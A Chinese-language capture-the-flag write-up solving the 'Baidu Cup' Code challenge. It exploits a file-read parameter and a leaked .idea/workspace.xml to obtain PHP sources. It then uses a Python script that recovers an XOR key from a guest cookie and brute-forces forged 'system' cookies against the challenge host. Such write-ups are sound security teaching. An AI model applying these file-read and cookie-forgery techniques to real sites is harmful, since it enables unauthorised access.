“百度杯”CTF比赛 九月场_Code(PhpStorm)
题目在i春秋ctf大本营
打开链接是一张图片,审查元素发现关键词base64,图片的内容都以base64加密后的形式呈现,查看url形式,应该是一个文件读取的漏洞
这里我们可以采用url/index.php?jpg=index.php来获取index.php的源代码经base64加密后的代码
base64解密后得到如下源码:
<?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/html;charset=utf-8'); if(! isset($_GET['jpg'])) header('Refresh:0;url=./index.php?jpg=hei.jpg'); $file = $_GET['jpg']; echo '<title>file:'.$file.'</title>'; $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file); $file = str_replace("config","_", $file); $txt = base64_encode(file_get_contents($file)); echo "<img src='data:image/gif;base64,".$txt."'></img>"; /* * Can you find the flag file? * */ ?>
这里对jpg传入的file进行一些操作,现将除了数字字母以外的字符删除,接着将config替换成_,接着将file内容进行base64加密
这里的关键是注释中的“Created by PhpStorm”,因为phpstorm写的会有一个 .idea 文件夹,里面存储了一些配置文件
访问url/.idea/workspace.xml,可以看到与index.php同一文件夹下的还有config.php,fl3g_ichuqiu.php
由于上面的代码给出了过滤条件,说明我们这里不能读到config.php,但可以读取fl3g_ichuqiu.php,根据上述代码,_要用config代替
访问url/index.php?jpg=fl3gconfigichuqiu.php,得到源码:
<?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ error_reporting(E_ALL || ~E_NOTICE); include('config.php'); function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') { //定义random函数,传入数字参数,返回相应位数的随机字符串 $hash = ''; $max = strlen($chars) - 1; for($i = 0; $i < $length; $i++) { $hash .= $chars[mt_rand(0, $max)]; } return $hash; } function encrypt($txt,$key){ //定义加密函数,先将传入的txt中的每个字符转ASCII码+10再转为字符串 for($i=0;$i<strlen($txt);$i++){ //将四位随机字符+传入的key并对其进行md5加密生成新的key $tmp .= chr(ord($txt[$i])+10); //将txt进行异或加密,结果返回base64编码过的ran+ttmp } $txt = $tmp; $rnd=random(4); $key=md5($rnd.$key); $s=0; for($i=0;$i<strlen($txt);$i++){ if($s == 32) $s = 0; $ttmp .= $txt[$i] ^ $key[++$s]; } return base64_encode($rnd.$ttmp); } function decrypt($txt,$key){ $txt=base64_decode($txt); $rnd = substr($txt,0,4); $txt = substr($txt,4); $key=md5($rnd.$key); $s=0; for($i=0;$i<strlen($txt);$i++){ if($s == 32) $s = 0; $tmp .= $txt[$i]^$key[++$s]; } for($i=0;$i<strlen($tmp);$i++){ $tmp1 .= chr(ord($tmp[$i])-10); } return $tmp1; } $username = decrypt($_COOKIE['user'],$key); if ($username == 'system'){ echo $flag; }else{ setcookie('user',encrypt('guest',$key)); echo "╮(╯▽╰)╭"; } ?>
这里的当务之急是要拿到输入的key的值,根据代码的最后一段:当cookie中user的值解密后不为system时,会给我们guest加密后的值,这就提醒我们key的前五位可以通过guest得知
给一下大佬的wp
# coding=utf-8 import base64 import requests text = 'guest' crypt = 'YldhV0lHV09O' crypt = base64.b64decode(crypt) rnd = crypt[0:4] crypt = crypt[4:] text1 = '' for i in text: text1 += chr(ord(i) + 10) key = '' for (i, j) in zip(text1, crypt): key += chr(ord(i) ^ ord(j)) text = 'system' text1 = '' for i in text: text1 += chr(ord(i) +10) cookies = [] for i in '0123456789abcdef': key1 = key + i tmp = '' for (j, k) in zip(text1, key1): tmp += chr(ord(j) ^ ord(k)) cookies.append(base64.b64encode(rnd + tmp)) #r = requests.session() for i in cookies: cookie = {'user':i} r = requests.session() result = r.get('http://2ec98f1fcd174a7c941546f366c1e55cc6935c1e07604c71.game.ichunqiu.com/fl3g_ichuqiu.php', cookies=cookie) print result.text